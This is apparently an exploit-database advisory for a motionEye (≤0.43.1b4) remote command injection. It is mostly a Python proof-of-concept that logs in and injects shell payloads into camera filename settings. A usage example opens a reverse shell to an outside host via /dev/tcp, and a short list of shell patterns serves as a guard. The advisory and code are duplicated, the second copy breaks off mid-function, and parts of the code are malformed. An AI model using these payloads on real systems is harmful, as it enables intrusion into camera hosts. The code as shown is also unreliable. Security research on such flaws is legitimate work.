7.2
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Description
A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters. Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.
Basic Information
ID
PACKETSTORM:215797
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : motionEye ≤ 0.43.1b4 Remote Command Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/motioneye-project/ |
=============================================================================================================================================
[+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4.
The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters.
Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.
Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full
system compromise, data exfiltration, service disruption, or lateral movement within the network.
The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import re
import json
import logging
from typing import Optional, Dict, List, Tuple, Set, Any
from urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import RequestException, Timeout, ConnectionError
# Suppress urllib3's InsecureRequestWarning output.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Root logger: INFO level, time-of-day prefix on every record.
logging.basicConfig(
    format='[%(asctime)s] %(levelname)s: %(message)s',
    datefmt='%H:%M:%S',
    level=logging.INFO,
)
logger = logging.getLogger(__name__)

# BeautifulSoup is optional at import time; BS_AVAILABLE records whether the
# import worked so later code can choose between HTML parsing and regex.
try:
    from bs4 import BeautifulSoup
except ImportError:
    BS_AVAILABLE = False
    logger.warning("BeautifulSoup not installed. HTML parsing will be limited.")
    logger.warning("Install with: pip install beautifulsoup4")
else:
    BS_AVAILABLE = True
class MotionEyeExploitError(Exception):
    """Dedicated exception class for MotionEye exploit errors; adds nothing to ``Exception``."""
class MotionEyeExploit:
# Cookie names accepted as evidence of a session; _has_valid_session()
# lowercases each cookie name before checking membership here.
SESSION_COOKIE_NAMES = {'session', 'motioneye.session', 'meye_session', 'beaker.session.id'}
# Substrings treated as success markers when a response body is classified
# (matched against the lowercased body text).
SUCCESS_INDICATORS = {
'success', 'saved', 'updated', 'applied', 'configuration saved'
}
def __init__(self, target_url: str, username: str = "admin", password: str = "", timeout: int = 30):
    """
    Store connection settings and prepare a reusable HTTP session.

    Args:
        target_url: Base URL of the target; trailing slashes are stripped.
        username: Login name.
        password: Login password.
        timeout: Default per-request timeout, applied by _make_request when
            the caller does not pass one.
    """
    # Connection settings.
    self.target_url = target_url.rstrip('/')
    self.username, self.password = username, password
    self.default_timeout = timeout

    # One shared session: certificate verification is switched off and a
    # fixed set of browser-like headers is sent with every request.
    http = requests.Session()
    http.verify = False
    self.session = http

    # State filled in by later steps.
    self.csrf_token: Optional[str] = None
    self.cameras: List[Dict] = []
    self.authenticated = False
    self.session_cookie_name: Optional[str] = None
    self.last_command: Optional[str] = None

    browser_headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
    }
    self.session.headers.update(browser_headers)
def _check_dependencies(self) -> bool:
    """Return True if BeautifulSoup was imported; otherwise log install advice and return False."""
    if BS_AVAILABLE:
        return True
    logger.error("BeautifulSoup is required for reliable HTML parsing.")
    logger.error("Install it with: pip install beautifulsoup4")
    return False
def _extract_csrf_token(self, html_content: str) -> Optional[str]:
    """
    Find a CSRF token in an HTML document.

    A fixed list of case-insensitive regexes is tried first, in order. If
    none matches and BeautifulSoup is available, the document is parsed and
    searched for an <input> or <meta> named ``csrf_token``, then for a
    ``csrf_token = "..."`` assignment inside any <script>.

    Args:
        html_content: Raw HTML text to search.

    Returns:
        The token string, or None (after a warning) when nothing is found.
    """
    regexes = (
        r'name=["\']csrf_token["\']\s+value=["\']([^"\']+)["\']',
        r'name=["\']csrf_token["\']\s+content=["\']([^"\']+)["\']',
        r'csrf_token[=:]\s*["\']([^"\']+)["\']',
        r'data-csrf-token=["\']([^"\']+)["\']',
        r'var\s+csrf_token\s*=\s*["\']([^"\']+)["\']',
    )
    attempts = (re.search(rx, html_content, re.IGNORECASE) for rx in regexes)
    first_hit = next((hit for hit in attempts if hit), None)
    if first_hit is not None:
        token = first_hit.group(1)
        logger.debug(f"Found CSRF token via regex: {token[:10]}...")
        return token

    if BS_AVAILABLE:
        try:
            soup = BeautifulSoup(html_content, 'html.parser')
            # <input value=...> is checked before <meta content=...>.
            for tag_name, attribute in (('input', 'value'), ('meta', 'content')):
                tag = soup.find(tag_name, {'name': 'csrf_token'})
                if tag and tag.get(attribute):
                    return tag[attribute]
            for script in soup.find_all('script'):
                if not script.string:
                    continue
                assignment = re.search(r'csrf_token\s*=\s*["\']([^"\']+)["\']', script.string)
                if assignment:
                    return assignment.group(1)
        except Exception as e:
            # Parsing problems are non-fatal; fall through to the warning.
            logger.debug(f"BeautifulSoup parsing error: {e}")

    logger.warning("Could not extract CSRF token")
    return None
def _has_valid_session(self) -> bool:
    """
    Report whether the session's cookie jar holds a known session cookie.

    Only the presence of a cookie whose lowercased name is listed in
    SESSION_COOKIE_NAMES is checked; the cookie's value is not inspected.
    The last matching name is stored in ``self.session_cookie_name``.
    """
    jar = self.session.cookies
    if not jar:
        logger.debug("No cookies found in session")
        return False

    matches = [name for name in jar.keys() if name.lower() in self.SESSION_COOKIE_NAMES]
    for name in matches:
        self.session_cookie_name = name
        logger.debug(f"Found potential session cookie: {name}")

    if not matches:
        logger.debug("No known session cookie names found")
        return False

    logger.debug(f"Session cookies found: {matches}")
    return True
def _verify_dashboard_access(self) -> bool:
    """
    Fetch '/' and report whether the page looks like the dashboard.

    Returns:
        True when the response is HTTP 200 and either a BeautifulSoup
        element lookup or a case-insensitive text pattern matches; False
        otherwise, including when any exception is raised along the way.
    """
    try:
        response = self._make_request('GET', '/', timeout=10)
        if not response or response.status_code != 200:
            logger.debug("Dashboard access failed: HTTP error")
            return False

        if BS_AVAILABLE:
            try:
                soup = BeautifulSoup(response.text, 'html.parser')
                lookups = (
                    ('div', {'attrs': {'id': 'dashboard'}}),
                    ('div', {'attrs': {'class': 'dashboard'}}),
                    ('div', {'attrs': {'data-page': 'dashboard'}}),
                    ('a', {'href': re.compile(r'/camera-\d+')}),
                    ('button', {'string': re.compile(r'cameras?', re.I)}),
                    ('span', {'string': re.compile(r'motioneye', re.I)}),
                )
                # Every lookup runs before the results are inspected.
                found = [soup.find(tag, **criteria) for tag, criteria in lookups]
                if any(found):
                    logger.debug("Dashboard access verified via BeautifulSoup")
                    return True
            except Exception as e:
                logger.debug(f"BeautifulSoup dashboard verification failed: {e}")

        # Plain-text fallback, also used when the element lookups found nothing.
        text_patterns = (
            r'dashboard',
            r'camera-\d+',
            r'motioneye',
            r'still_images',
            r'movies',
        )
        hit = next((p for p in text_patterns if re.search(p, response.text, re.I)), None)
        if hit is not None:
            logger.debug(f"Dashboard access verified via regex pattern: {hit}")
            return True

        logger.debug("No dashboard indicators found in response")
        return False
    except Exception as e:
        logger.debug(f"Dashboard verification error: {e}")
        return False
def _make_request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]:
    """
    Send an HTTP request through the shared session, retrying on transport errors.

    Args:
        method: HTTP verb passed to ``session.request``.
        endpoint: Path appended verbatim to ``self.target_url``.
        **kwargs: Forwarded to ``session.request``. ``timeout`` defaults to
            ``self.default_timeout``. ``max_retries`` (default 2) is consumed
            here and is the total number of attempts; values below 1 are
            treated as 1.

    Returns:
        The first response received, whatever its status code, or None when
        every attempt raised a ``RequestException``.
    """
    url = f"{self.target_url}{endpoint}"
    kwargs.setdefault('timeout', self.default_timeout)
    # Always make at least one attempt. A zero or negative value previously
    # skipped the loop and reported failure without sending anything.
    max_retries = max(1, kwargs.pop('max_retries', 2))

    for attempt in range(max_retries):
        try:
            logger.debug(f"Making {method} request to {endpoint} (attempt {attempt + 1})")
            response = self.session.request(method, url, **kwargs)
            logger.debug(f"Response status: {response.status_code}")
            logger.debug(f"Response headers: {dict(response.headers)}")
            return response
        except Timeout as e:
            logger.warning(f"Request timeout to {endpoint} (attempt {attempt + 1}): {e}")
        except ConnectionError as e:
            logger.warning(f"Connection error to {endpoint}: {e} (attempt {attempt + 1})")
        except RequestException as e:
            logger.warning(f"Request failed for {endpoint}: {e} (attempt {attempt + 1})")

        # Linear back-off between attempts; no sleep after the final one.
        if attempt < max_retries - 1:
            wait_time = 1 * (attempt + 1)
            logger.debug(f"Waiting {wait_time} seconds before retry...")
            time.sleep(wait_time)

    logger.error(f"All {max_retries} attempts failed for {endpoint}")
    return None
def login(self) -> bool:
    """
    Authenticate against the target and mark the instance as authenticated.

    An existing session is reused when a known session cookie is present and
    the dashboard check passes. Otherwise the page at '/' is fetched for a
    CSRF token and the credentials are posted to '/login' without following
    redirects.

    Returns:
        True once ``self.authenticated`` has been set; False on any failure.
    """
    logger.info(f"Attempting login to {self.target_url} as {self.username}")

    if self._has_valid_session():
        logger.debug("Found session cookies, verifying dashboard access...")
        if self._verify_dashboard_access():
            logger.info("Already have valid session")
            self.authenticated = True
            return True
        logger.debug("Session cookies present but cannot access dashboard")

    landing = self._make_request('GET', '/')
    if not landing:
        logger.error("Failed to fetch login page")
        return False

    self.csrf_token = self._extract_csrf_token(landing.text)
    if not self.csrf_token:
        logger.error("Could not extract CSRF token from login page")
        return False
    logger.debug(f"CSRF token extracted: {self.csrf_token[:10]}...")

    response = self._make_request(
        'POST', '/login',
        data={
            'username': self.username,
            'password': self.password,
            'csrf_token': self.csrf_token
        },
        allow_redirects=False,
        max_retries=1
    )
    if not response:
        return False

    # Decide from the POST response alone whether the login looks accepted.
    login_success = False
    status = response.status_code
    if status == 302:
        location = response.headers.get('Location', '')
        if location == '/' or 'dashboard' in location:
            login_success = True
            logger.debug("Login success via 302 redirect")
    elif status == 200:
        if self._has_valid_session():
            login_success = True
            logger.debug("Login success via session cookie")
        elif 'window.location' in response.text and ('/' in response.text or 'dashboard' in response.text):
            login_success = True
            logger.debug("Login success via JavaScript redirect")

    if not login_success:
        logger.error(f"Login failed. Status code: {response.status_code}")
        return False

    if self._verify_dashboard_access():
        logger.info("Login successful - dashboard accessible")
        self.authenticated = True
        return True

    # Dashboard check failed; a known session cookie is still accepted.
    logger.warning("Login seemed successful but dashboard not accessible")
    if self._has_valid_session():
        self.authenticated = True
        return True
    return False
def get_cameras(self, force_refresh: bool = False) -> bool:
    """
    Populate ``self.cameras`` from the page served at '/'.

    Args:
        force_refresh: If True, empty the cached list and fetch again;
            otherwise a non-empty cached list is reused as-is.

    Returns:
        False when authentication or the page request fails, True otherwise.
        A placeholder 'camera-1' entry is added if nothing is detected.
    """
    if force_refresh:
        self.cameras.clear()
        logger.debug("Cleared existing camera list")
    elif self.cameras:
        logger.debug(f"Using cached camera list ({len(self.cameras)} cameras)")
        return True

    logger.info("Fetching list of cameras")
    if not (self.authenticated or self.login()):
        logger.error("Not authenticated")
        return False

    response = self._make_request('GET', '/')
    if not response:
        return False

    seen = set()

    def remember(camera_id, label):
        # Record a camera once; empty ids and repeats are ignored.
        if camera_id and camera_id not in seen:
            self.cameras.append({
                'id': camera_id,
                'name': label
            })
            seen.add(camera_id)

    if BS_AVAILABLE:
        try:
            soup = BeautifulSoup(response.text, 'html.parser')
            # Three sources, in order: links, data-camera-id divs, <option> values.
            for anchor in soup.find_all('a', href=re.compile(r'^/camera-\d+')):
                ident = anchor.get('href').strip('/')
                remember(ident, anchor.get_text().strip() or ident)
            for block in soup.find_all('div', {'data-camera-id': True}):
                ident = block.get('data-camera-id')
                remember(ident, block.get('data-camera-name', ident))
            for entry in soup.find_all('option', value=re.compile(r'^camera-\d+')):
                ident = entry.get('value')
                remember(ident, entry.get_text().strip() or ident)
        except Exception as e:
            logger.error(f"Error parsing cameras with BeautifulSoup: {e}")

    if not self.cameras:
        logger.debug("Using regex fallback for camera detection")
        for number in set(re.findall(r'/camera-(\d+)', response.text)):
            self.cameras.append({
                'id': f"camera-{number}",
                'name': f"Camera {number}"
            })

    if not self.cameras:
        logger.warning("No cameras found, using default 'camera-1'")
        self.cameras.append({'id': 'camera-1', 'name': 'Default Camera'})

    logger.info(f"Found {len(self.cameras)} unique camera(s): {[c['id'] for c in self.cameras]}")
    return True
def _escape_for_transport(self, command: str) -> str:
"""
Escape a command for safe transport in HTTP POST data.
This ensures the command is properly transmitted, not escaped for shell.
"""
escaped = command.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")
dangerous_chars = ['`', '$', '(', ')', '|', '&', ';', '<', '>', '*', '?', '[', ']', '{', '}']
found_chars = [c for c in dangerous_chars if c in command]
if found_chars:
logger.info(f"Command contains shell metacharacters: {found_chars}")
logger.debug("These are INTENTIONAL for command injection")
return escaped
def _check_response_success(self, response: requests.Response) -> Tuple[bool, str]:
    """
    Classify a response as a successful or failed configuration update.

    Checks run in this order: accepted status code, JSON body fields
    (``status``, ``success``, ``error``), error words in the lowercased
    body, SUCCESS_INDICATORS in the lowercased body, and finally the
    ``Location`` header of a 302.

    Returns:
        ``(success, message)``, where ``message`` names the check that decided.
    """
    if response.status_code not in [200, 201, 202, 204, 302]:
        return False, f"HTTP {response.status_code}"

    try:
        payload = response.json()
    except (json.JSONDecodeError, ValueError):
        payload = None  # not JSON; fall back to text inspection

    if isinstance(payload, dict):
        if payload.get('status') == 'ok':
            return True, "JSON status: ok"
        if payload.get('success') is True:
            return True, "JSON success: true"
        if payload.get('error'):
            return False, f"JSON error: {payload['error']}"

    body = response.text.lower()

    # Any error word rules out success, even alongside a success marker.
    if any(word in body for word in ['error', 'fail', 'invalid', 'denied', 'forbidden']):
        if any(marker.lower() in body for marker in self.SUCCESS_INDICATORS):
            logger.warning("Response contains both success and error indicators")
            return False, "Ambiguous response (both success and error)"
        return False, "Error indicators found"

    matched = next((m for m in self.SUCCESS_INDICATORS if m.lower() in body), None)
    if matched is not None:
        return True, f"Found indicator: {matched}"

    if response.status_code == 302:
        location = response.headers.get('Location', '')
        target = location.lower()
        if 'success' in target or 'saved' in target:
            return True, f"Redirect to: {location}"

    return False, "No success indicators found"
def inject_payload(self, camera_id: str, command: str) -> bool:
"""
Inject malicious payload into camera configuration.
safe_command = self._escape_for_transport(command)
payload_variants = [
f"$({safe_command}).%Y-%m-%d-%H-%M-%S",
f"`{safe_command}`.%Y-%m-%d-%H-%M-%S",
f";{safe_command};.%Y-%m-%d-%H-%M-%S",
f"|{safe_command}|.%Y-%m-%d-%H-%M-%S",
]
logger.info(f"Injecting payload into camera: {camera_id}")
response = self._make_request('GET', '/', timeout=10)
if response:
token = self._extract_csrf_token(response.text)
if token:
self.csrf_token = token
logger.debug("Refreshed CSRF token")
endpoints = [
f"/{camera_id}/config/set",
"/config/set",
f"/{camera_id}/edit",
"/config/update",
"/settings/camera",
]
for endpoint in endpoints:
for idx, payload in enumerate(payload_variants):
logger.debug(f"Trying endpoint: {endpoint} with payload variant {idx + 1}")
data = {
'still_images_image_file_name': payload,
'movie_file_name': payload,
'timelapse_file_name': payload,
}
if self.csrf_token:
data['csrf_token'] = self.csrf_token
headers = {}
if self.csrf_token:
headers['X-CSRFToken'] = self.csrf_token
response = self._make_request('POST', endpoint, data=data, headers=headers)
if not response:
continue
success, message = self._check_response_success(response)
if success:
logger.info(f"Payload injected successfully via {endpoint}")
logger.debug(f"Success message: {message}")
return True
logger.debug(f"Endpoint {endpoint} returned: {message}")
logger.error(f"Failed to inject payload through any endpoint for camera {camera_id}")
return False
def restart_motion(self) -> bool:
"""
Attempt to restart motion service through various endpoints.
"""
logger.info("Attempting to restart motion service")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
restart_endpoints = [
('/action/restart', 'POST', {}),
('/action/restart_motion', 'POST', {}),
('/action/restart_all', 'POST', {}),
('/config/restart', 'POST', {}),
('/restart', 'GET', {}),
('/api/restart', 'POST', {'Content-Type': 'application/json'}),
]
for endpoint, method, headers in restart_endpoints:
logger.debug(f"Trying {method} {endpoint}")
data = {}
if self.csrf_token and method == 'POST':
data['csrf_token'] = self.csrf_token
try:
if method == 'POST':
response = self._make_request('POST', endpoint, data=data, headers=headers)
else:
response = self._make_request('GET', endpoint, headers=headers)
if response:
if response.status_code in [200, 202, 204, 302]:
logger.info(f"Restart triggered via {endpoint}")
return True
else:
logger.debug(f"Endpoint {endpoint} returned {response.status_code}")
except Exception as e:
logger.debug(f"Error with {endpoint}: {e}")
continue
logger.warning("Could not trigger restart automatically")
return False
def verify_exploit(self, expected_file: str = "/tmp/pwned_verified") -> bool:
"""
Verify if the exploit was successful by checking for expected evidence.
Returns True if verification succeeded, False if failed or inconclusive.
"""
logger.info("Verifying exploit success...")
if self.last_command and 'touch' in self.last_command:
touch_match = re.search(r'touch\s+([^\s;|&]+)', self.last_command)
if touch_match:
expected_file = touch_match.group(1)
logger.info(f"Looking for created file: {expected_file}")
filename = expected_file.split('/')[-1] if '/' in expected_file else expected_file
web_paths = [
f"/motion/{filename}",
f"/static/{filename}",
f"/media/{filename}",
f"/{filename}",
]
for web_path in web_paths:
response = self._make_request('GET', web_path, timeout=10)
if response and response.status_code == 200:
logger.info(f"Found expected file at {web_path}")
return True
logger.info("=" * 60)
logger.info("MANUAL VERIFICATION REQUIRED:")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command executed: {self.last_command or 'unknown'}")
logger.info(f"Expected evidence: {expected_file}")
logger.info("\nTo verify on Docker:")
logger.info(f" docker exec motioneye ls -la {expected_file}")
logger.info("\nTo verify on system:")
logger.info(f" ls -la {expected_file}")
logger.info("\nTo verify via web (if accessible):")
logger.info(f" curl -k {self.target_url}/motion/")
logger.info("=" * 60)
return False
def run(self, command: str) -> Dict[str, bool]:
"""
Execute the full exploit chain.
Returns dictionary with status of each step.
"""
results = {
'login': False,
'cameras': False,
'injection': False,
'restart': False,
'verification': False,
'overall': False
}
self.last_command = command
logger.info("=" * 60)
logger.info("Starting motionEye RCE exploit")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command: {command}")
logger.info("=" * 60)
if not self._check_dependencies():
logger.error("Dependencies check failed")
return results
if not self.login():
logger.error("Login failed. Exiting.")
return results
results['login'] = True
if not self.get_cameras():
logger.error("Failed to get camera list")
return results
results['cameras'] = True
injection_success = False
for camera in self.cameras:
if self.inject_payload(camera['id'], command):
injection_success = True
break
if not injection_success:
logger.error("Failed to inject payload into any camera")
results['injection'] = False
return results
results['injection'] = True
if self.restart_motion():
results['restart'] = True
wait_time = 10
logger.info(f"Waiting {wait_time} seconds for command execution...")
time.sleep(wait_time)
results['verification'] = self.verify_exploit()
results['overall'] = injection_success
logger.info("=" * 60)
logger.info("Exploit execution completed")
logger.info(f"Results: {results}")
logger.info("=" * 60)
return results
def main():
"""
Main function with argument parsing.
"""
import argparse
parser = argparse.ArgumentParser(
description="MotionEye <= 0.43.1b4 RCE Exploit (CVE-2025-60787)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://192.168.1.100:8765 -c "touch /tmp/pwned"
%(prog)s -t https://motioneye.local -c "id > /tmp/output" -v
%(prog)s -t http://localhost:9999 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --dangerous
"""
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., http://127.0.0.1:8765)')
parser.add_argument('-u', '--username', default='admin',
help='Username (default: admin)')
parser.add_argument('-p', '--password', default='',
help='Password (default: empty)')
parser.add_argument('-c', '--command',
default='touch /tmp/pwned_by_exploit',
help='Command to execute (default: touch /tmp/pwned_by_exploit)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
parser.add_argument('--dangerous', action='store_true',
help='Acknowledge that the command may be dangerous')
parser.add_argument('--camera', help='Specific camera ID to target (default: auto-detect)')
parser.add_argument('--timeout', type=int, default=30,
help='Request timeout in seconds (default: 30)')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
dangerous_patterns = ['bash -i', 'nc ', 'reverse', 'shell', 'exec', '/dev/tcp/']
if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous:
logger.warning(" Command appears to be potentially dangerous!")
logger.warning("Use --dangerous flag to proceed with this command")
sys.exit(1)
exploit = MotionEyeExploit(
target_url=args.target,
username=args.username,
password=args.password,
timeout=args.timeout
)
try:
results = exploit.run(args.command)
if results['overall']:
if results['verification']:
logger.info(" Exploit fully successful - command execution verified")
sys.exit(0)
else:
logger.info(" Exploit likely successful - manual verification required")
sys.exit(2)
else:
logger.error(" Exploit failed")
sys.exit(1)
except KeyboardInterrupt:
logger.info("\nExploit interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : motionEye ≤ 0.43.1b4 Remote Command Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/motioneye-project/ |
=============================================================================================================================================
[+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4.
The issue arises from improper validation and sanitization of user‑supplied input within camera configuration parameters.
Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.
Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full
system compromise, data exfiltration, service disruption, or lateral movement within the network.
The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import re
import json
import logging
from typing import Optional, Dict, List, Tuple, Set, Any
from urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import RequestException, Timeout, ConnectionError
# Suppress urllib3's InsecureRequestWarning output.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Root logger: INFO level, time-of-day prefix on every record.
logging.basicConfig(
    format='[%(asctime)s] %(levelname)s: %(message)s',
    datefmt='%H:%M:%S',
    level=logging.INFO,
)
logger = logging.getLogger(__name__)

# BeautifulSoup is optional at import time; BS_AVAILABLE records whether the
# import worked so later code can choose between HTML parsing and regex.
try:
    from bs4 import BeautifulSoup
except ImportError:
    BS_AVAILABLE = False
    logger.warning("BeautifulSoup not installed. HTML parsing will be limited.")
    logger.warning("Install with: pip install beautifulsoup4")
else:
    BS_AVAILABLE = True
class MotionEyeExploitError(Exception):
    """Dedicated exception class for MotionEye exploit errors; adds nothing to ``Exception``."""
class MotionEyeExploit:
# Cookie names accepted as evidence of a session; _has_valid_session()
# lowercases each cookie name before checking membership here.
SESSION_COOKIE_NAMES = {'session', 'motioneye.session', 'meye_session', 'beaker.session.id'}
# Substrings treated as success markers when a response body is classified
# (matched against the lowercased body text).
SUCCESS_INDICATORS = {
'success', 'saved', 'updated', 'applied', 'configuration saved'
}
def __init__(self, target_url: str, username: str = "admin", password: str = "", timeout: int = 30):
    """
    Store connection settings and prepare a reusable HTTP session.

    Args:
        target_url: Base URL of the target; trailing slashes are stripped.
        username: Login name.
        password: Login password.
        timeout: Default per-request timeout, applied by _make_request when
            the caller does not pass one.
    """
    # Connection settings.
    self.target_url = target_url.rstrip('/')
    self.username, self.password = username, password
    self.default_timeout = timeout

    # One shared session: certificate verification is switched off and a
    # fixed set of browser-like headers is sent with every request.
    http = requests.Session()
    http.verify = False
    self.session = http

    # State filled in by later steps.
    self.csrf_token: Optional[str] = None
    self.cameras: List[Dict] = []
    self.authenticated = False
    self.session_cookie_name: Optional[str] = None
    self.last_command: Optional[str] = None

    browser_headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
    }
    self.session.headers.update(browser_headers)
def _check_dependencies(self) -> bool:
    """Return True if BeautifulSoup was imported; otherwise log install advice and return False."""
    if BS_AVAILABLE:
        return True
    logger.error("BeautifulSoup is required for reliable HTML parsing.")
    logger.error("Install it with: pip install beautifulsoup4")
    return False
def _extract_csrf_token(self, html_content: str) -> Optional[str]:
    """
    Find a CSRF token in an HTML document.

    A fixed list of case-insensitive regexes is tried first, in order. If
    none matches and BeautifulSoup is available, the document is parsed and
    searched for an <input> or <meta> named ``csrf_token``, then for a
    ``csrf_token = "..."`` assignment inside any <script>.

    Args:
        html_content: Raw HTML text to search.

    Returns:
        The token string, or None (after a warning) when nothing is found.
    """
    regexes = (
        r'name=["\']csrf_token["\']\s+value=["\']([^"\']+)["\']',
        r'name=["\']csrf_token["\']\s+content=["\']([^"\']+)["\']',
        r'csrf_token[=:]\s*["\']([^"\']+)["\']',
        r'data-csrf-token=["\']([^"\']+)["\']',
        r'var\s+csrf_token\s*=\s*["\']([^"\']+)["\']',
    )
    attempts = (re.search(rx, html_content, re.IGNORECASE) for rx in regexes)
    first_hit = next((hit for hit in attempts if hit), None)
    if first_hit is not None:
        token = first_hit.group(1)
        logger.debug(f"Found CSRF token via regex: {token[:10]}...")
        return token

    if BS_AVAILABLE:
        try:
            soup = BeautifulSoup(html_content, 'html.parser')
            # <input value=...> is checked before <meta content=...>.
            for tag_name, attribute in (('input', 'value'), ('meta', 'content')):
                tag = soup.find(tag_name, {'name': 'csrf_token'})
                if tag and tag.get(attribute):
                    return tag[attribute]
            for script in soup.find_all('script'):
                if not script.string:
                    continue
                assignment = re.search(r'csrf_token\s*=\s*["\']([^"\']+)["\']', script.string)
                if assignment:
                    return assignment.group(1)
        except Exception as e:
            # Parsing problems are non-fatal; fall through to the warning.
            logger.debug(f"BeautifulSoup parsing error: {e}")

    logger.warning("Could not extract CSRF token")
    return None
def _has_valid_session(self) -> bool:
    """
    Report whether the session's cookie jar holds a known session cookie.

    Only the presence of a cookie whose lowercased name is listed in
    SESSION_COOKIE_NAMES is checked; the cookie's value is not inspected.
    The last matching name is stored in ``self.session_cookie_name``.
    """
    jar = self.session.cookies
    if not jar:
        logger.debug("No cookies found in session")
        return False

    matches = [name for name in jar.keys() if name.lower() in self.SESSION_COOKIE_NAMES]
    for name in matches:
        self.session_cookie_name = name
        logger.debug(f"Found potential session cookie: {name}")

    if not matches:
        logger.debug("No known session cookie names found")
        return False

    logger.debug(f"Session cookies found: {matches}")
    return True
def _verify_dashboard_access(self) -> bool:
    """
    Fetch '/' and report whether the page looks like the dashboard.

    Returns:
        True when the response is HTTP 200 and either a BeautifulSoup
        element lookup or a case-insensitive text pattern matches; False
        otherwise, including when any exception is raised along the way.
    """
    try:
        response = self._make_request('GET', '/', timeout=10)
        if not response or response.status_code != 200:
            logger.debug("Dashboard access failed: HTTP error")
            return False

        if BS_AVAILABLE:
            try:
                soup = BeautifulSoup(response.text, 'html.parser')
                lookups = (
                    ('div', {'attrs': {'id': 'dashboard'}}),
                    ('div', {'attrs': {'class': 'dashboard'}}),
                    ('div', {'attrs': {'data-page': 'dashboard'}}),
                    ('a', {'href': re.compile(r'/camera-\d+')}),
                    ('button', {'string': re.compile(r'cameras?', re.I)}),
                    ('span', {'string': re.compile(r'motioneye', re.I)}),
                )
                # Every lookup runs before the results are inspected.
                found = [soup.find(tag, **criteria) for tag, criteria in lookups]
                if any(found):
                    logger.debug("Dashboard access verified via BeautifulSoup")
                    return True
            except Exception as e:
                logger.debug(f"BeautifulSoup dashboard verification failed: {e}")

        # Plain-text fallback, also used when the element lookups found nothing.
        text_patterns = (
            r'dashboard',
            r'camera-\d+',
            r'motioneye',
            r'still_images',
            r'movies',
        )
        hit = next((p for p in text_patterns if re.search(p, response.text, re.I)), None)
        if hit is not None:
            logger.debug(f"Dashboard access verified via regex pattern: {hit}")
            return True

        logger.debug("No dashboard indicators found in response")
        return False
    except Exception as e:
        logger.debug(f"Dashboard verification error: {e}")
        return False
def _make_request(self, method: str, endpoint: str, **kwargs) -> Optional[requests.Response]:
    """
    Send an HTTP request through the shared session, retrying on transport errors.

    Args:
        method: HTTP verb passed to ``session.request``.
        endpoint: Path appended verbatim to ``self.target_url``.
        **kwargs: Forwarded to ``session.request``. ``timeout`` defaults to
            ``self.default_timeout``. ``max_retries`` (default 2) is consumed
            here and is the total number of attempts; values below 1 are
            treated as 1.

    Returns:
        The first response received, whatever its status code, or None when
        every attempt raised a ``RequestException``.
    """
    url = f"{self.target_url}{endpoint}"
    kwargs.setdefault('timeout', self.default_timeout)
    # Always make at least one attempt. A zero or negative value previously
    # skipped the loop and reported failure without sending anything.
    max_retries = max(1, kwargs.pop('max_retries', 2))

    for attempt in range(max_retries):
        try:
            logger.debug(f"Making {method} request to {endpoint} (attempt {attempt + 1})")
            response = self.session.request(method, url, **kwargs)
            logger.debug(f"Response status: {response.status_code}")
            logger.debug(f"Response headers: {dict(response.headers)}")
            return response
        except Timeout as e:
            logger.warning(f"Request timeout to {endpoint} (attempt {attempt + 1}): {e}")
        except ConnectionError as e:
            logger.warning(f"Connection error to {endpoint}: {e} (attempt {attempt + 1})")
